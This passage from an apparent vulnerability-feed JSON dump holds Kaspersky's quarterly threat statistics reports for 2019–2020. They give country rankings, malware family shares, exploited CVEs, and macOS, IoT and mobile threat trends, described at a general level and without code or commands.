targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.", "cvss3": {}, "published": "2019-08-19T10:00:00", "type": "securelist", "title": "IT threat evolution Q2 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0798", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-0863", "CVE-2019-0973", "CVE-2019-10149", "CVE-2019-1069", "CVE-2019-11707", "CVE-2019-11708"], "modified": "2019-08-19T10:00:00", "id": "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "href": "https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-03T13:05:29", "description": "\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 | Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet&#x27;s activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 | \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 | \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 4.7 | \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 | \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 | \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 | \n \n_** Unique users attacked by this __malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims to regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers&#x27; work harder? No one knows for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 \u2013 Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% | \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% | \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% | \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% | \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% | \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% | \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% | \n| | | | | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users __attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner&#x27;s activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. This type of threats shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>) codes. Both were fixed, and neither is known to have been exploited in the wild. Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user&#x27;s privileges by generating a specially formatted LNK file.\n\nThe trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones were [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute the code with system privileges. In that mode, the attacker can install any software and access any information on the computer.\n\n## Attacks on Apple macOS\n\nIn Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict of Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective C, the difference will be very significant: the size of a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.\n\n**Top 20 threats for macOS **\n\n| Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 17.39 \n2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 \n3 | AdWare.OSX.Pirrit.j | 9.10 \n4 | AdWare.OSX.Bnodlero.at | 8.21 \n5 | AdWare.OSX.Cimpli.k | 7.32 \n6 | AdWare.OSX.Pirrit.o | 5.57 \n7 | Trojan-Downloader.OSX.Agent.h | 4.19 \n8 | AdWare.OSX.Ketin.h | 4.03 \n9 | AdWare.OSX.Pirrit.x | 4.00 \n10 | AdWare.OSX.Spc.a | 3.98 \n11 | AdWare.OSX.Amc.c | 3.97 \n12 | Backdoor.OSX.Lador.a | 3.91 \n13 | AdWare.OSX.Pirrit.v | 3.22 \n14 | RiskTool.OSX.Spigot.a | 2.89 \n15 | AdWare.OSX.Bnodlero.t | 2.87 \n16 | AdWare.OSX.Cimpli.f | 2.85 \n17 | AdWare.OSX.Adload.g | 2.60 \n18 | AdWare.OSX.Pirrit.aa | 2.54 \n19 | AdWare.OSX.MacSearch.d | 2.44 \n20 | AdWare.OSX.Adload.h | 2.35 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nThe rankings of the most common threats for the macOS platform has not changed much compared to the previous quarter and is still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.\n\nThe Lador.a backdoor, which we mentioned above, entered the rankings along with adware.\n\nFinally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user&#x27;s browsing history to the developer&#x27;s servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.\n\n### Threat geography\n\n_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 9.82% \n2 | France | 7.73% \n3 | Mexico | 6.70% \n4 | Italy | 6.54% \n5 | India | 6.47% \n6 | Canada | 6.34% \n7 | Brazil | 6.25% \n8 | USA | 5.99% \n9 | United Kingdom | 5.90% \n10 | Russia | 5.77% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country._\n\nThe most common threats in all the countries on the list without exception bundled various adware with the Shlayer Trojan.\n\n## IoT attacks\n\n### IoT threat statistics\n\nQ2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.\n\nTelnet | 80.83% \n---|--- \nSSH | 19.17% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_\n\nFurther communication with IoT devices that pretended to be infected (and actually traps), was much more often conducted via Telnet.\n\nTelnet | 71.52% \n---|--- \nSSH | 28.48% \n \n_Distribution of cybercriminals&#x27; working sessions with Kaspersky traps, Q2 2020_\n\n_Geography of IP addresses of device from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 12.75% \nBrazil | 11.88% \nEgypt | 8.32% \nTaiwan | 6.58% \nIran | 5.17% \nIndia | 4.84% \nRussia | 4.76% \nVietnam | 3.59% \nGreece | 3.22% \nUSA | 2.94% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nThe three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.\n\n_Geography of IP addresses of device from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 22.12% \nUSA | 10.91% \nVietnam | 8.20% \nBrazil | 5.34% \nGermany | 4.68% \nRussia | 4.44% \nFrance | 3.42% \nIndia | 3.01% \nEgypt | 2.77% \nSingapore | 2.59% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nAs with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).\n\n### Threats loaded into traps\n\n**Verdict** | **%*** \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 32.78 \nBackdoor.Linux.Mirai.b | 17.47 \nHEUR:Backdoor.Linux.Mirai.b | 12.72 \nHEUR:Backdoor.Linux.Gafgyt.a | 9.76 \nBackdoor.Linux.Mirai.ba | 7.99 \nHEUR:Backdoor.Linux.Mirai.ba | 4.49 \nBackdoor.Linux.Gafgyt.bj | 2.23 \nHEUR:Trojan-Downloader.Shell.Agent.p | 1.66 \nBackdoor.Linux.Mirai.cn | 1.26 \nHEUR:Backdoor.Linux.Mirai.c | 0.73 \n \n_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nAs in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 11.2052 \n2 | Mongolia | 11.0337 \n3 | Albania | 9.8699 \n4 | France | 9.8668 \n5 | Tunisia | 9.6513 \n6 | Bulgaria | 9.5252 \n7 | Libya | 8.5995 \n8 | Morocco | 8.4784 \n9 | Greece | 8.3735 \n10 | Vietnam | 8.2298 \n11 | Somalia | 8.0938 \n12 | Georgia | 7.9888 \n13 | Malaysia | 7.9866 \n14 | Latvia | 7.8978 \n15 | UAE | 7.8675 \n16 | Qatar | 7.6820 \n17 | Angola | 7.5147 \n18 | R\u00e9union | 7.4958 \n19 | Laos | 7.4757 \n20 | Mozambique | 7.4702 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._\n\nIn Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 48.0224 \n2 | Uzbekistan | 42.2632 \n3 | Tajikistan | 42.1279 \n4 | Ethiopia | 41.7213 \n5 | Afghanistan | 40.6278 \n6 | Myanmar | 39.1377 \n7 | Burkina Faso | 37.4560 \n8 | Benin | 37.4390 \n9 | China | 36.7346 \n10 | Kyrgyzstan | 36.0847 \n11 | Vietnam | 35.4327 \n12 | Mauritania | 34.2613 \n13 | Laos | 34.0350 \n14 | Mongolia | 33.6261 \n15 | Burundi | 33.4323 \n16 | Belarus | 33.0937 \n17 | Guinea | 33.0097 \n18 | Mali | 32.9902 \n19 | Togo | 32.6962 \n20 | Cameroon | 32.6347 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n__** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_\n\nOverall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.", "cvss3": {}, "published": "2020-09-03T10:30:23", "type": "securelist", "title": "IT threat evolution Q2 2020. PC statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2020-0796", "CVE-2020-1206", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1425", "CVE-2020-1457", "CVE-2020-6819", "CVE-2020-6820"], "modified": "2020-09-03T10:30:23", "id": "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "href": "https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-20T11:49:25", "description": "\n\n_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.\n * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.\n * Ransomware attacks were defeated on the computers of 178,922 unique users.\n * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 1,152,662 malicious installation packages\n * 42,115 installation packages for mobile banking trojans\n * 4339 installation packages for mobile ransomware trojans\n\n## Mobile threats\n\n### Quarter events\n\nQ1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for \u20ac0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.\n\nAnother interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.\n\nThe third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the changes of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.\n\n### Mobile threat statistics\n\nIn Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.\n\n_Number of malicious installation packages detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_\n\nStarting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_\n\nOf all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).\n\nPotentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.\n\nIn third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and 